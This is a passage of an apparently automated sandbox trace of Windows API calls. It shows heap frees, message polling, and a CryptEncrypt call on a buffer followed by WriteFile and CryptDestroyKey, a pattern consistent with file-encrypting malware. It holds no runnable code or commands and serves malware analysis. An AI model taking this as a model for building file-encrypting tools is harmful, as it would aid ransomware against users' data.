hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0102.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a82be0 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0102.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0102.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0102.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0102.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.215] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4550, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4558) returned 1 [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] CharLowerBuffW (in: lpsz="byte[17752]", cchLength=0xb | out: lpsz="byte[17752]") returned 0xb [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.216] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.216] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.217] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a82be0*, pdwDataLen=0x8cef60*=0x4550, dwBufLen=0x4558 | out: pbData=0x2a82be0*, pdwDataLen=0x8cef60*=0x4558) returned 1 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.217] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.218] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.218] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.218] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.218] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.218] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.219] WriteFile (in: hFile=0x44c, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x4558, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x4558, lpOverlapped=0x0) returned 1 [0102.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.221] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0102.221] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.221] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0102.221] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.221] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.221] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.221] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.221] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0102.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9ad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0102.221] CryptDestroyKey (hKey=0x9a4780) returned 1 [0102.222] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.222] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.222] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.222] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.222] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.222] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.268] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.268] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.269] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.269] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.269] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.269] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.269] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.269] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.269] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.269] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0102.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.269] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0102.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.269] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0102.269] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.315] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0102.315] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.315] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.315] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.315] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.316] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.316] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.316] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.316] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.316] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.316] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0102.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, 